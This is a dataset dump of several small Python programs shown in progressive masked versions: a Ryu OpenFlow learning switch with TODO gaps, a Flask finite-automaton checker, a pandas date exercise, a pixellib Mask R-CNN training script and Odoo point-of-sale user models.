"step-3": "<mask token>\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n\n def add_flow(self, datapath, in_port, dst, src, actions):\n ofproto = datapath.ofproto\n match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=\n haddr_to_bin(dst), dl_src=haddr_to_bin(src))\n mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=\n match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,\n hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=\n ofproto.OFPFF_SEND_FLOW_REM, actions=actions)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n return\n if eth.ethertype == ether_types.ETH_TYPE_IPV6:\n return\n dst = eth.dst\n src = eth.src\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',\n dpid, src, dst, msg.in_port)\n self.mac_to_port[dpid][src] = msg.in_port\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n if out_port != ofproto.OFPP_FLOOD:\n self.logger.info(\n 'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '\n , dpid, src, dst, msg.in_port, out_port)\n self.add_flow(datapath, msg.in_port, dst, src, actions)\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n print('PACKET_OUT...')\n",
"step-4": "from ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_0\nfrom ryu.lib.mac import haddr_to_bin\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import ether_types\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n\n def add_flow(self, datapath, in_port, dst, src, actions):\n ofproto = datapath.ofproto\n match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=\n haddr_to_bin(dst), dl_src=haddr_to_bin(src))\n mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=\n match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,\n hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=\n ofproto.OFPFF_SEND_FLOW_REM, actions=actions)\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n return\n if eth.ethertype == ether_types.ETH_TYPE_IPV6:\n return\n dst = eth.dst\n src = eth.src\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',\n dpid, src, dst, msg.in_port)\n self.mac_to_port[dpid][src] = msg.in_port\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n if out_port != ofproto.OFPP_FLOOD:\n self.logger.info(\n 'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '\n , dpid, src, dst, msg.in_port, out_port)\n self.add_flow(datapath, msg.in_port, dst, src, actions)\n data = None\n if msg.buffer_id == 
ofproto.OFP_NO_BUFFER:\n data = msg.data\n print('PACKET_OUT...')\n",
"step-5": "from ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import MAIN_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.ofproto import ofproto_v1_0\n\nfrom ryu.lib.mac import haddr_to_bin\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import ether_types\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n\t# TODO define OpenFlow 1.0 version for the switch\n\t# add your code here\n\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(SimpleSwitch, self).__init__(*args, **kwargs)\n\t\tself.mac_to_port = {}\n \n \n\tdef add_flow(self, datapath, in_port, dst, src, actions):\n\t\tofproto = datapath.ofproto\n\n\t\tmatch = datapath.ofproto_parser.OFPMatch(\n in_port=in_port,\n dl_dst=haddr_to_bin(dst), dl_src=haddr_to_bin(src))\n\n\t\tmod = datapath.ofproto_parser.OFPFlowMod(\n datapath=datapath, match=match, cookie=0,\n command=ofproto.OFPFC_ADD, idle_timeout=0, hard_timeout=0,\n priority=ofproto.OFP_DEFAULT_PRIORITY,\n flags=ofproto.OFPFF_SEND_FLOW_REM, actions=actions)\n\t\t# TODO send modified message out\n\t\t# add your code here\n\n\t@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n\tdef _packet_in_handler(self, ev):\n\t\tmsg = ev.msg\n\t\tdatapath = msg.datapath\n\t\tofproto = datapath.ofproto\n\n\t\tpkt = packet.Packet(msg.data)\n\t\teth = pkt.get_protocol(ethernet.ethernet)\n\n\t\tif eth.ethertype == ether_types.ETH_TYPE_LLDP:\n\t\t\t# ignore lldp packet\n\t\t\treturn\n\t\tif eth.ethertype == ether_types.ETH_TYPE_IPV6:\n\t\t\t# ignore ipv6 packet\n\t\t\treturn \n\t\t\n\t\tdst = eth.dst\n\t\tsrc = eth.src\n\t\tdpid = datapath.id\n\t\tself.mac_to_port.setdefault(dpid, {})\n\n\t\tself.logger.info(\"packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s\", dpid, src, dst, msg.in_port)\n\n\t\t# learn a mac address to avoid FLOOD next time.\n\t\tself.mac_to_port[dpid][src] = msg.in_port\n\n\t\tif dst in self.mac_to_port[dpid]:\n\t\t\tout_port = 
self.mac_to_port[dpid][dst]\n\t\telse:\n\t\t\tout_port = ofproto.OFPP_FLOOD\n\n\t\t# TODO define the action for output\n\t\t# add your code here\n\n\n # install a flow to avoid packet_in next time\n\t\tif out_port != ofproto.OFPP_FLOOD:\n\t\t\tself.logger.info(\"add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] \", dpid, src, dst, msg.in_port, out_port)\n\t\t\tself.add_flow(datapath, msg.in_port, dst, src, actions)\n\n\t\tdata = None\n\t\tif msg.buffer_id == ofproto.OFP_NO_BUFFER:\n\t\t\tdata = msg.data\n \n\n\t\t# TODO define the OpenFlow Packet Out\n\t\t# add your code here\n\n\tprint (\"PACKET_OUT...\")\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
from typing import Set, Dict, Tuple
from flask import Flask, render_template, request
app = Flask(__name__)
app.config['SECRET_KEY'] = 'top_secret'
# Определение константных величин
RULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S',
('H', 'b'): 'SE',
('S', 'b'): 'SE',
('SE', 'a'): 'SE',
('SE', 'b'): 'SE'}
INITIAL_STATE: str = 'H'
FINAL_STATE: Set[str] = {'S', 'SE'}
def finite_automate(word: str) -> str:
"""Реализация конечного автомата для проверки символьных строк"""
state: str = INITIAL_STATE
for ind, char in enumerate(word):
yield f'{word[ind:]} --> {state}'
state = RULE.get((state, char))
if not state:
break
if state in FINAL_STATE:
yield 'Цепочка принадлежит языку'
else:
yield 'Цепочка не принадлежит языку'
@app.route('/', methods=['GET', 'POST'])
def index():
res = None
if request.method == 'POST':
res = finite_automate(request.form['word'])
return render_template('index.html', res=res)
|
normal
|
{
"blob_id": "86ea1c46383b5a8790eb187163107f4100395ef3",
"index": 8962,
"step-1": "<mask token>\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-2": "<mask token>\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-4": "from typing import Set, Dict, Tuple\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S', ('H', 'b'): 'SE', ('S',\n 'b'): 'SE', ('SE', 'a'): 'SE', ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) ->str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n",
"step-5": "from typing import Set, Dict, Tuple\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'top_secret'\n\n# Определение константных величин\nRULE: Dict[Tuple[str, str], str] = {('H', 'a'): 'S',\n ('H', 'b'): 'SE',\n ('S', 'b'): 'SE',\n ('SE', 'a'): 'SE',\n ('SE', 'b'): 'SE'}\nINITIAL_STATE: str = 'H'\nFINAL_STATE: Set[str] = {'S', 'SE'}\n\n\ndef finite_automate(word: str) -> str:\n \"\"\"Реализация конечного автомата для проверки символьных строк\"\"\"\n state: str = INITIAL_STATE\n for ind, char in enumerate(word):\n yield f'{word[ind:]} --> {state}'\n state = RULE.get((state, char))\n if not state:\n break\n\n if state in FINAL_STATE:\n yield 'Цепочка принадлежит языку'\n else:\n yield 'Цепочка не принадлежит языку'\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n res = None\n if request.method == 'POST':\n res = finite_automate(request.form['word'])\n return render_template('index.html', res=res)\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(df.head())
print()
<|reserved_special_token_0|>
print(df.head())
print('------------------')
<|reserved_special_token_0|>
print(df.head())
print('------------------')
df.set_index('Date_m', inplace=True)
print(df.head())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
df = pd.read_csv('../../datasets/part5/stock-data.csv')
df['new_Date'] = pd.to_datetime(df['Date'])
print(df.head())
print()
df['Year'] = df['new_Date'].dt.year
df['Month'] = df['new_Date'].dt.month
df['Day'] = df['new_Date'].dt.day
print(df.head())
print('------------------')
df['Date_yr'] = df['new_Date'].dt.to_period(freq='A')
df['Date_m'] = df['new_Date'].dt.to_period(freq='M')
print(df.head())
print('------------------')
df.set_index('Date_m', inplace=True)
print(df.head())
<|reserved_special_token_1|>
import pandas as pd
df = pd.read_csv('../../datasets/part5/stock-data.csv')
df['new_Date'] = pd.to_datetime(df['Date'])
print(df.head())
print()
df['Year'] = df['new_Date'].dt.year
df['Month'] = df['new_Date'].dt.month
df['Day'] = df['new_Date'].dt.day
print(df.head())
print('------------------')
df['Date_yr'] = df['new_Date'].dt.to_period(freq='A')
df['Date_m'] = df['new_Date'].dt.to_period(freq='M')
print(df.head())
print('------------------')
df.set_index('Date_m', inplace=True)
print(df.head())
<|reserved_special_token_1|>
#%%
### 날짜 데이터 분리
# 연-월-일 날짜 데이터에서 일부 분리 추출
import pandas as pd
df = pd.read_csv('../../datasets/part5/stock-data.csv')
# 문자열인 날짜 데이터를 판다스 Timestamp로 변환
df['new_Date'] = pd.to_datetime(df['Date']) # df에 새로운 열로 추가
print(df.head())
print()
# dt 속성을 이용하여 new_Data 열의 연-월-일 정보를 년, 월, 일로 구분
df['Year'] = df['new_Date'].dt.year
df['Month'] = df['new_Date'].dt.month
df['Day'] = df['new_Date'].dt.day
print(df.head())
print('------------------')
# Timestamp를 Period로 변환하여 연-월-일 표기 변경하기
# to_period() 메소드를 적용하여, 연-월-일 중 연-월 또는 연도를 추출
df['Date_yr'] = df['new_Date'].dt.to_period(freq='A') # 연도를 나타내는 값 저장
df['Date_m'] = df['new_Date'].dt.to_period(freq='M') # 연-월을 나타내는 값 저장
print(df.head())
print('------------------')
# 원하는 열을 행 인덱스로 지정
df.set_index('Date_m', inplace=True)
print(df.head())
# %%
|
flexible
|
{
"blob_id": "d89e1d653c6db322feb6edba93cbfc622bf47aa2",
"index": 2781,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(df.head())\nprint()\n<mask token>\nprint(df.head())\nprint('------------------')\n<mask token>\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-3": "<mask token>\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\ndf['new_Date'] = pd.to_datetime(df['Date'])\nprint(df.head())\nprint()\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A')\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M')\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-4": "import pandas as pd\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\ndf['new_Date'] = pd.to_datetime(df['Date'])\nprint(df.head())\nprint()\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A')\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M')\nprint(df.head())\nprint('------------------')\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n",
"step-5": "#%%\n\n### 날짜 데이터 분리\n# 연-월-일 날짜 데이터에서 일부 분리 추출\n\nimport pandas as pd\n\ndf = pd.read_csv('../../datasets/part5/stock-data.csv')\n\n# 문자열인 날짜 데이터를 판다스 Timestamp로 변환\ndf['new_Date'] = pd.to_datetime(df['Date']) # df에 새로운 열로 추가\nprint(df.head())\nprint()\n\n# dt 속성을 이용하여 new_Data 열의 연-월-일 정보를 년, 월, 일로 구분\ndf['Year'] = df['new_Date'].dt.year\ndf['Month'] = df['new_Date'].dt.month\ndf['Day'] = df['new_Date'].dt.day\nprint(df.head())\nprint('------------------')\n\n# Timestamp를 Period로 변환하여 연-월-일 표기 변경하기\n# to_period() 메소드를 적용하여, 연-월-일 중 연-월 또는 연도를 추출 \ndf['Date_yr'] = df['new_Date'].dt.to_period(freq='A') # 연도를 나타내는 값 저장\ndf['Date_m'] = df['new_Date'].dt.to_period(freq='M') # 연-월을 나타내는 값 저장\nprint(df.head())\nprint('------------------')\n\n# 원하는 열을 행 인덱스로 지정\ndf.set_index('Date_m', inplace=True)\nprint(df.head())\n# %%\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
train_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,
batch_size=1)
train_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')
train_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')
train_maskRcnn.evaluate_model('c:/models/eval')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
train_maskRcnn = instance_custom_training()
train_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,
batch_size=1)
train_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')
train_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')
train_maskRcnn.evaluate_model('c:/models/eval')
<|reserved_special_token_1|>
import pixellib
from pixellib.custom_train import instance_custom_training
train_maskRcnn = instance_custom_training()
train_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,
batch_size=1)
train_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')
train_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')
train_maskRcnn.evaluate_model('c:/models/eval')
<|reserved_special_token_1|>
# first we have to label the Banana / Apple / Tomato in the images
# we will use lables me
# pip install pyqt5
# pip install labelme
# after labeling the images. lets test it.
#Each image has a json file
import pixellib
from pixellib.custom_train import instance_custom_training
train_maskRcnn = instance_custom_training()
# num_classes=3 since we have 3 classes : Banana , Apple , Tomato
train_maskRcnn.modelConfig(network_backbone="resnet101",num_classes=3, batch_size=1)
#https://github.com/matterport/Mask_RCNN/releases
# you can download here the 2.0 version for the model
train_maskRcnn.load_pretrained_model("c:/models/mask_rcnn_coco.h5")
train_maskRcnn.load_dataset("Object-Detection/Pixellib/customModel")
# The model directory has several files in this format : mask_rcnn_model.*
# It is saved with the epoch number
# we would like to evaluate each model and find the best one
# lets test a specific model :
#train_maskRcnn.evaluate_model("c:/models/mask_rcnn_model.051-0.252276.h5")
# The evaluation for this epoch is : 0.636364
# we would like to evaluate all the models.
# since the direcroty is not empty , I will just copy all the models to a new directory .
# lets test the result of all models
train_maskRcnn.evaluate_model("c:/models/eval")
# These are the results :
# c:/models/eval\mask_rcnn_model.001-1.361029.h5 evaluation using iou_threshold 0.5 is 0.000000
# c:/models/eval\mask_rcnn_model.002-0.597196.h5 evaluation using iou_threshold 0.5 is 0.000000
# c:/models/eval\mask_rcnn_model.004-0.463875.h5 evaluation using iou_threshold 0.5 is 0.272727
# c:/models/eval\mask_rcnn_model.006-0.376810.h5 evaluation using iou_threshold 0.5 is 0.272727
# c:/models/eval\mask_rcnn_model.008-0.342451.h5 evaluation using iou_threshold 0.5 is 0.363636
# c:/models/eval\mask_rcnn_model.010-0.301472.h5 evaluation using iou_threshold 0.5 is 0.454545
# c:/models/eval\mask_rcnn_model.015-0.267621.h5 evaluation using iou_threshold 0.5 is 0.590909
# # this is the best model - since it has the high evaluate number : 0.636
# c:/models/eval\mask_rcnn_model.051-0.252276.h5 evaluation using iou_threshold 0.5 is 0.636364
# mask_rcnn_model.051-0.252276.h5 #
|
flexible
|
{
"blob_id": "cb4ca5f91c7cd47197784085258536166055afe9",
"index": 4212,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntrain_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,\n batch_size=1)\ntrain_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')\ntrain_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')\ntrain_maskRcnn.evaluate_model('c:/models/eval')\n",
"step-3": "<mask token>\ntrain_maskRcnn = instance_custom_training()\ntrain_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,\n batch_size=1)\ntrain_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')\ntrain_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')\ntrain_maskRcnn.evaluate_model('c:/models/eval')\n",
"step-4": "import pixellib\nfrom pixellib.custom_train import instance_custom_training\ntrain_maskRcnn = instance_custom_training()\ntrain_maskRcnn.modelConfig(network_backbone='resnet101', num_classes=3,\n batch_size=1)\ntrain_maskRcnn.load_pretrained_model('c:/models/mask_rcnn_coco.h5')\ntrain_maskRcnn.load_dataset('Object-Detection/Pixellib/customModel')\ntrain_maskRcnn.evaluate_model('c:/models/eval')\n",
"step-5": "# first we have to label the Banana / Apple / Tomato in the images\n# we will use lables me\n\n# pip install pyqt5\n# pip install labelme\n\n# after labeling the images. lets test it.\n#Each image has a json file \n\nimport pixellib\nfrom pixellib.custom_train import instance_custom_training\n\ntrain_maskRcnn = instance_custom_training()\n\n# num_classes=3 since we have 3 classes : Banana , Apple , Tomato\ntrain_maskRcnn.modelConfig(network_backbone=\"resnet101\",num_classes=3, batch_size=1)\n\n#https://github.com/matterport/Mask_RCNN/releases\n# you can download here the 2.0 version for the model \ntrain_maskRcnn.load_pretrained_model(\"c:/models/mask_rcnn_coco.h5\") \ntrain_maskRcnn.load_dataset(\"Object-Detection/Pixellib/customModel\")\n\n# The model directory has several files in this format : mask_rcnn_model.*\n# It is saved with the epoch number\n\n# we would like to evaluate each model and find the best one\n\n# lets test a specific model :\n\n#train_maskRcnn.evaluate_model(\"c:/models/mask_rcnn_model.051-0.252276.h5\")\n\n# The evaluation for this epoch is : 0.636364 \n\n# we would like to evaluate all the models.\n# since the direcroty is not empty , I will just copy all the models to a new directory .\n\n# lets test the result of all models\n\ntrain_maskRcnn.evaluate_model(\"c:/models/eval\")\n\n# These are the results :\n# c:/models/eval\\mask_rcnn_model.001-1.361029.h5 evaluation using iou_threshold 0.5 is 0.000000 \n\n# c:/models/eval\\mask_rcnn_model.002-0.597196.h5 evaluation using iou_threshold 0.5 is 0.000000 \n\n# c:/models/eval\\mask_rcnn_model.004-0.463875.h5 evaluation using iou_threshold 0.5 is 0.272727 \n\n# c:/models/eval\\mask_rcnn_model.006-0.376810.h5 evaluation using iou_threshold 0.5 is 0.272727 \n\n# c:/models/eval\\mask_rcnn_model.008-0.342451.h5 evaluation using iou_threshold 0.5 is 0.363636 \n\n# c:/models/eval\\mask_rcnn_model.010-0.301472.h5 evaluation using iou_threshold 0.5 is 0.454545 \n\n# 
c:/models/eval\\mask_rcnn_model.015-0.267621.h5 evaluation using iou_threshold 0.5 is 0.590909 \n\n# # this is the best model - since it has the high evaluate number : 0.636\n# c:/models/eval\\mask_rcnn_model.051-0.252276.h5 evaluation using iou_threshold 0.5 is 0.636364 \n\n# mask_rcnn_model.051-0.252276.h5 #\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
print('Hello!')
<|reserved_special_token_1|>
#write a program that displays the wor "Hello!"
print("Hello!")
|
flexible
|
{
"blob_id": "b7a7941b3555b30ac7e743a5457df76f9eb7cb15",
"index": 9714,
"step-1": "<mask token>\n",
"step-2": "print('Hello!')\n",
"step-3": "#write a program that displays the wor \"Hello!\"\n\nprint(\"Hello!\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from odoo import api, tools, fields, models, _
import base64
from odoo import modules
class InheritUser(models.Model):
_inherit = 'pos.config'
related_pos_user = fields.One2many('pos.session.users', 'pos_config', string='Related User')
class InheritSession(models.Model):
_name = 'pos.session.users'
user = fields.Many2one('res.users')
pos_config = fields.Many2one('pos.config')
class InheritUser(models.Model):
_inherit = 'res.users'
pos_sessions = fields.Many2many('pos.config', string='Point of Sale Accessible')
@api.multi
def write(self, vals):
if 'pos_sessions' in vals:
if vals['pos_sessions'][0][2]:
self.env["pos.session.users"].search(
[('user', '=', self.id)]).unlink()
for pos_session in vals['pos_sessions'][0][2]:
self.env['pos.session.users'].create({'pos_config': pos_session, 'user': self.id})
else:
self.env["pos.session.users"].search(
[('user', '=', self.id)]).unlink()
result = super(InheritUser, self).write(vals)
return result
@api.model
def create(self, vals):
create_id = super(InheritUser, self).create(vals)
if vals['pos_sessions'][0][2]:
for pos_session in vals['pos_sessions'][0][2]:
self.env['pos.session.users'].create({'pos_config': pos_session, 'user': create_id.id})
return create_id
|
normal
|
{
"blob_id": "2cff5fdfc86793592dd97de90ba9c3a11870b356",
"index": 8987,
"step-1": "<mask token>\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n pos_sessions = fields.Many2many('pos.config', string=\n 'Point of Sale Accessible')\n\n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': self.id})\n else:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': create_id.id})\n return create_id\n",
"step-2": "<mask token>\n\n\nclass InheritSession(models.Model):\n _name = 'pos.session.users'\n user = fields.Many2one('res.users')\n pos_config = fields.Many2one('pos.config')\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n pos_sessions = fields.Many2many('pos.config', string=\n 'Point of Sale Accessible')\n\n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': self.id})\n else:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': create_id.id})\n return create_id\n",
"step-3": "<mask token>\n\n\nclass InheritUser(models.Model):\n <mask token>\n <mask token>\n\n\nclass InheritSession(models.Model):\n _name = 'pos.session.users'\n user = fields.Many2one('res.users')\n pos_config = fields.Many2one('pos.config')\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n pos_sessions = fields.Many2many('pos.config', string=\n 'Point of Sale Accessible')\n\n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': self.id})\n else:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = super(InheritUser, self).create(vals)\n if vals['pos_sessions'][0][2]:\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': create_id.id})\n return create_id\n",
"step-4": "<mask token>\n\n\nclass InheritUser(models.Model):\n _inherit = 'pos.config'\n related_pos_user = fields.One2many('pos.session.users', 'pos_config',\n string='Related User')\n\n\nclass InheritSession(models.Model):\n _name = 'pos.session.users'\n user = fields.Many2one('res.users')\n pos_config = fields.Many2one('pos.config')\n\n\nclass InheritUser(models.Model):\n _inherit = 'res.users'\n pos_sessions = fields.Many2many('pos.config', string=\n 'Point of Sale Accessible')\n\n @api.multi\n def write(self, vals):\n if 'pos_sessions' in vals:\n if vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n for pos_session in vals['pos_sessions'][0][2]:\n self.env['pos.session.users'].create({'pos_config':\n pos_session, 'user': self.id})\n else:\n self.env['pos.session.users'].search([('user', '=', self.id)]\n ).unlink()\n result = super(InheritUser, self).write(vals)\n return result\n\n @api.model\n def create(self, vals):\n create_id = 